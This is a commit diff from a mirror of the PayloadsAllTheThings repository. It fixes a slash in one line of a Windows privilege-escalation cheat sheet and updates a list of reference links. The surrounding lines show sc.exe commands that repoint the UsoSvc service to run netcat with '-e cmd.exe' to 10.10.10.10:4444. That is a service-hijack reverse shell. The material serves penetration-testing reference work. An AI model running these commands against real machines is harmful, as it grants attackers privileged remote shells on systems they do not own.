mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
replaced backslash with forwardslash in cmd syntax
As defined in cmd.exe /? /C Carries out the command specified by string and then terminates
This commit is contained in:
parent
12ee527763
commit
2ef501f883
1 changed files with 2 additions and 2 deletions
|
@ -730,7 +730,7 @@ Prerequisite: Service account
|
|||
PS C:\Windows\system32> sc.exe stop UsoSvc
|
||||
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||
PS C:\Windows\system32> sc.exe qc usosvc
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
|
@ -1494,4 +1494,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
|||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
|
||||
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
||||
|
|
Loading…
Reference in a new issue